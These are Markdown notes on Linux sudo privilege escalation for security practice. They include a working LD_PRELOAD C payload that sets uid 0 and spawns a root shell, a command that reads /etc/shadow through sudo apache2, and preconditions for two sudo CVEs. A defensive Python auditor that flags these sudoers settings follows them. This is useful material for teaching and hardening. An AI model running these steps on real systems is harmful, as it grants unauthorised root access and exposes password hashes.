# Sudo

## SUDO SHELL ESCAPING:

Use GTFOBins: <https://gtfobins.github.io/>

Practice: <https://tryhackme.com/room/privescplayground>

## INTENDED FUNCTIONALITY:

When you can't find an exploit on GTFOBins, you may still be able to abuse some intended functionality of the program you are allowed to run. Suppose the program is apache2; then search: **sudo apache2 privilege escalation**

Some of these exploits won't let you get a shell, but they can help you view system files: the program prints the line it doesn't understand in its error message.

Ex: apache2, wget

**sudo apache2 -f /etc/shadow**

## LD\_PRELOAD:

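```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid(), setuid() */

/* Runs when the dynamic linker loads this shared object. */
void _init() {
    unsetenv("LD_PRELOAD");   /* keep child processes from loading it again */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
```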

## CVE-2019-14287: sudo 1.8.27

If we get **(ALL, !root) /bin/bash**

## CVE-2019-18634:

Find the sudo version using: **sudo -V**

If the version is 1.8.21p2 and password feedback is enabled
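
A defensive counterpart to the LD\_PRELOAD, CVE-2019-14287 and CVE-2019-18634 sections, added here as an example (not part of the original notes): a Python check that reads `sudo -l` output and flags the sudoers settings those sections depend on. The sample listings, the finding names and `audit_sudo_listing` are constructed for illustration; `env_keep` and `pwfeedback` are sudoers Defaults options.

```python
import re

# Constructed `sudo -l` output for illustration (not captured from a real host).
RISKY = """\
Matching Defaults entries for alice on lab:
    env_reset, pwfeedback, env_keep+="LD_PRELOAD LANG"

User alice may run the following commands on lab:
    (ALL, !root) /bin/bash
    (root) NOPASSWD: /usr/sbin/apache2
"""
HARDENED = """\
Matching Defaults entries for alice on lab:
    env_reset, !pwfeedback, env_keep+=LANG

User alice may run the following commands on lab:
    (www-data) /usr/bin/systemctl reload apache2
"""

ENV_KEEP = re.compile(r'env_keep\s*\+?=\s*("[^"]*"|[^,\s]+)')
PWFEEDBACK = re.compile(r'(?<![!\w])pwfeedback\b')   # ignores "!pwfeedback"
RUNAS = re.compile(r'^\(([^):]*)(?::[^)]*)?\)')      # "(users : groups)" prefix

def audit_sudo_listing(text):
    """Return sorted finding codes for the sudoers settings these notes rely on."""
    findings = set()
    for line in (l.strip() for l in text.splitlines()):
        # Defaults: LD_PRELOAD is preserved across sudo's environment reset.
        for value in ENV_KEEP.findall(line):
            if "LD_PRELOAD" in value.strip('"').split():
                findings.add("env_keep_ld_preload")
        # Defaults: password feedback, the precondition named for CVE-2019-18634.
        if PWFEEDBACK.search(line):
            findings.add("pwfeedback_enabled")
        # Runas list that allows ALL users and excludes one by negation.
        m = RUNAS.match(line)
        if m:
            users = [u.strip() for u in m.group(1).split(",")]
            if "ALL" in users and any(u.startswith("!") for u in users):
                findings.add("runas_all_with_negation")
    return sorted(findings)

if __name__ == "__main__":
    for name, sample in (("risky", RISKY), ("hardened", HARDENED)):
        print(name, audit_sudo_listing(sample))
```

Any finding is a reason to review the sudoers policy: drop LD\_PRELOAD from `env_keep`, disable `pwfeedback`, and replace negated Runas lists with an explicit list of allowed users.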
